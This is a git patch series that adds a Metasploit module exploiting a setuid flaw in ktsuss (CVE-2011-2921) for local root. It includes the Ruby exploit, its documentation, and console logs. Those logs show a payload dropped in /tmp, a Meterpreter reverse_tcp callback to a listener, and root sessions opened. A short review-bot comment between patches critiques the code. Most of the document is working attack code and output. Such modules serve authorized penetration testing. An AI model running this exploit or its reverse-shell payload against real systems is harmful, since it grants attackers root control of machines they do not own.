From ca82e6cd2566eca3a7b9d27776532b77b6292ee8 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Mon, 19 Aug 2019 13:28:02 +0000 Subject: [PATCH 1/3] Add ktsuss suid Privilege Escalation module --- .../linux/local/ktsuss_suid_priv_esc.rb | 142 ++++++++++++++++++ 1 file changed, 142 insertions(+) create mode 100644 modules/exploits/linux/local/ktsuss_suid_priv_esc.rb diff --git a/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb b/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb new file mode 100644 index 0000000000..e13581d08d --- /dev/null +++ b/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb 
@@ -0,0 +1,142 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::File + include Msf::Post::Linux::Priv + include Msf::Post::Linux::System + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ktsuss suid Privilege Escalation', + 'Description' => %q{ + This module attempts to gain root privileges by exploiting + a vulnerability in ktsuss versions 1.4 and prior. + + The `ktsuss` executable is setuid `root` and does not drop + privileges prior to executing user specified commands, + resulting in command execution with `root` privileges. + + This module has been tested successfully on: + + ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64); and + ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'John Lightsey', # Discovery and exploit + 'bcoles' # Metasploit + ], + 'DisclosureDate' => '2011-08-13', + 'References' => + [ + ['CVE', '2011-2921'], + ['URL', 'https://www.openwall.com/lists/oss-security/2011/08/13/2'], + ['URL', 'https://security.gentoo.org/glsa/201201-15'], + ['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2011-2921/ktsuss-lpe.sh'] + ], + 'Platform' => ['linux'], + 'Arch' => + [ + ARCH_X86, + ARCH_X64, + ARCH_ARMLE, + ARCH_AARCH64, + ARCH_PPC, + ARCH_MIPSLE, + ARCH_MIPSBE + ], + 'SessionTypes' => ['shell', 'meterpreter'], + 'Targets' => [['Auto', {}]], + 'DefaultOptions' => + { + 'AppendExit' => true, + 'PrependSetresuid' => true, + 'PrependSetresgid' => true, + 'PrependSetreuid' => true, + 'PrependSetuid' => true, + 'PrependFork' => true + }, + 'DefaultTarget' => 0)) + register_options [ + OptString.new('KTSUSS_PATH', [true, 'Path to staprun executable', '/usr/bin/ktsuss']) + ] + register_advanced_options [ + 
OptBool.new('ForceExploit', [false, 'Override check result', false]), + OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) + ] + end + + def ktsuss_path + datastore['KTSUSS_PATH'] + end + + def base_dir + datastore['WritableDir'].to_s + end + + def upload(path, data) + print_status "Writing '#{path}' (#{data.size} bytes) ..." + rm_f path + write_file path, data + register_file_for_cleanup path + end + + def upload_and_chmodx(path, data) + upload path, data + chmod path + end + + def check + unless setuid? ktsuss_path + vprint_error "#{ktsuss_path} is not setuid" + return CheckCode::Safe + end + vprint_good "#{ktsuss_path} is setuid" + + id = cmd_exec 'whoami' + res = cmd_exec("#{ktsuss_path} -u #{id} id").to_s + vprint_status res + + unless res.include? 'uid=0' + return CheckCode::Safe + end + + CheckCode::Vulnerable + end + + def exploit + unless check == CheckCode::Vulnerable + unless datastore['ForceExploit'] + fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' + end + print_warning 'Target does not appear to be vulnerable' + end + + if is_root? + unless datastore['ForceExploit'] + fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' + end + end + + unless writable? base_dir + fail_with Failure::BadConfig, "#{base_dir} is not writable" + end + + payload_name = ".#{rand_text_alphanumeric 10..15}" + payload_path = "#{base_dir}/#{payload_name}" + upload_and_chmodx payload_path, generate_payload_exe + + print_status 'Executing payload ...' + id = cmd_exec 'whoami' + res = cmd_exec "#{ktsuss_path} -u #{id} #{payload_path} & echo " + vprint_line res + end +end From 9ce3365d56a07849e8880f2bcbf997dac718f07e Mon Sep 17 00:00:00 2001 
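Review bot: The KTSUSS_PATH option in register_options is described as `'Path to staprun executable'`, which names the wrong binary and looks carried over from another module; it should read `OptString.new('KTSUSS_PATH', [true, 'Path to ktsuss executable', '/usr/bin/ktsuss'])`. Separately, `check` does not merely inspect the target: it runs the setuid binary with `-u #{id} id` and decides on `uid=0` in the output, so a `check` already executes a command through the vulnerable program, which is worth a comment above the `cmd_exec` call (something like `# active check: runs 'id' through the setuid binary and looks for euid 0`). In both `check` and `exploit`, the result of `cmd_exec 'whoami'` is interpolated into the command line unchecked; if `whoami` is absent or fails the line degrades to `ktsuss -u  id`, so consider `fail_with Failure::Unknown, 'Could not determine current user' if id.blank?` after reading it, or use `id -un` as a fallback.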
From: Brendan Coles Date: Mon, 19 Aug 2019 13:34:52 +0000 Subject: [PATCH 2/3] Add documentation --- .../linux/local/ktsuss_suid_priv_esc.md | 124 ++++++++++++++++++ 1 file changed, 124 insertions(+) create mode 100644 documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md diff --git a/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md b/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md new file mode 100644 index 0000000000..6fbda64963 --- /dev/null +++ b/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md 
@@ -0,0 +1,124 @@ +## Description + + This module attempts to gain root privileges by exploiting + a vulnerability in ktsuss versions 1.4 and prior. + + The `ktsuss` executable is setuid `root` and does not drop + privileges prior to executing user specified commands, + resulting in command execution with `root` privileges. + + This module has been tested successfully on: + + +## Vulnerable Application + + This module has been tested successfully on: + + * ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64) + * ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64) + + +## Verification Steps + + 1. Start `msfconsole` + 2. Get a session + 3. `use exploit/linux/local/ktsuss_suid_priv_esc` + 4. `set SESSION [SESSION]` + 5. `check` + 6. `run` + 7. You should get a new *root* session + + +## Options + + **KTSUSS_PATH** + + Path to `ktsuss` executable (default: `/usr/bin/ktsuss`) + + **WritableDir** + + A writable directory file system path. (default: `/tmp`) + + +## Scenarios + +### ktsuss 1.3 on SparkyLinux 5.8 (LXQT) (x64) + + ``` + msf5 > use exploit/linux/local/ktsuss_suid_priv_esc + msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set session 1 + session => 1 + msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set verbose true + verbose => true + msf5 exploit(linux/local/ktsuss_suid_priv_esc) > check + + [+] /usr/bin/ktsuss is setuid + [*] uid=1001(test) gid=1001(test) euid=0(root) groups=1001(test) + [+] The target is vulnerable. + msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp + payload => linux/x64/meterpreter/reverse_tcp + msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set lhost 172.16.191.165 + lhost => 172.16.191.165 + msf5 exploit(linux/local/ktsuss_suid_priv_esc) > run + + [*] Started reverse TCP handler on 172.16.191.165:4444 + [+] /usr/bin/ktsuss is setuid + [*] uid=1001(test) gid=1001(test) euid=0(root) groups=1001(test) + [*] Writing '/tmp/.lBanpIYpAJ60cwt' (389 bytes) ... + [*] Executing payload ... 
+ [*] Transmitting intermediate stager...(126 bytes) + [*] Sending stage (3021284 bytes) to 172.16.191.137 + + [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.137:53060) at 2019-08-19 09:18:29 -0400 + + meterpreter > getuid + Server username: uid=0, gid=0, euid=0, egid=0 + meterpreter > sysinfo + Computer : 172.16.191.137 + OS : Sparky 5.8 (Linux 4.19.0-5-amd64) + Architecture : x64 + BuildTuple : x86_64-linux-musl + Meterpreter : x64/linux + meterpreter > + ``` + +### tsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64) + + ``` + msf5 > use exploit/linux/local/ktsuss_suid_priv_esc + msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set session 1 + session => 1 + msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set verbose true + verbose => true + msf5 exploit(linux/local/ktsuss_suid_priv_esc) > check + + [+] /usr/bin/ktsuss is setuid + [*] uid=1001(test) gid=1002(test) euid=0(root) groups=1002(test) + [+] The target is vulnerable. + msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp + payload => linux/x64/meterpreter/reverse_tcp + msf5 exploit(linux/local/ktsuss_suid_priv_esc) > set lhost 172.16.191.165 + lhost => 172.16.191.165 + msf5 exploit(linux/local/ktsuss_suid_priv_esc) > run + + [*] Started reverse TCP handler on 172.16.191.165:4444 + [+] /usr/bin/ktsuss is setuid + [*] uid=1001(test) gid=1002(test) euid=0(root) groups=1002(test) + [*] Writing '/tmp/.R0aTPpB8aHk' (389 bytes) ... + [*] Executing payload ... + [*] Transmitting intermediate stager...(126 bytes) + [*] Sending stage (3021284 bytes) to 172.16.191.167 + + [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.167:44534) at 2019-08-19 09:25:48 -0400 + + meterpreter > getuid + Server username: uid=0, gid=0, euid=0, egid=0 + meterpreter > sysinfo + Computer : 172.16.191.167 + OS : Sparky 6 (Linux 4.19.0-5-amd64) + Architecture : x64 + BuildTuple : x86_64-linux-musl + Meterpreter : x64/linux + meterpreter > + ``` + 
From 4b9e7488828a8046dd4fc7ba352aaa6038c9efc7 Mon Sep 17 00:00:00 2001 From: h00die Date: Mon, 2 Sep 2019 13:31:30 -0400 Subject: [PATCH 3/3] ktsuss misc fixes --- .../modules/exploit/linux/local/ktsuss_suid_priv_esc.md | 4 +--- modules/exploits/linux/local/ktsuss_suid_priv_esc.rb | 4 ++-- 2 files changed, 3 insertions(+), 5 deletions(-) diff --git a/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md b/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md index 6fbda64963..2ce5b01541 100644 --- a/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md +++ b/documentation/modules/exploit/linux/local/ktsuss_suid_priv_esc.md @@ -7,8 +7,6 @@ privileges prior to executing user specified commands, resulting in command execution with `root` privileges. - This module has been tested successfully on: - ## Vulnerable Application @@ -82,7 +80,7 @@ meterpreter > ``` -### tsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64) +### ktsuss 1.3 on SparkyLinux 6 (2019.08) (LXQT) (x64) ``` msf5 > use exploit/linux/local/ktsuss_suid_priv_esc diff --git a/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb b/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb index e13581d08d..f854ee21d0 100644 --- a/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb +++ b/modules/exploits/linux/local/ktsuss_suid_priv_esc.rb @@ -19,9 +19,9 @@ class MetasploitModule < Msf::Exploit::Local This module attempts to gain root privileges by exploiting a vulnerability in ktsuss versions 1.4 and prior. - The `ktsuss` executable is setuid `root` and does not drop + The ktsuss executable is setuid root and does not drop privileges prior to executing user specified commands, - resulting in command execution with `root` privileges. + resulting in command execution with root privileges. This module has been tested successfully on: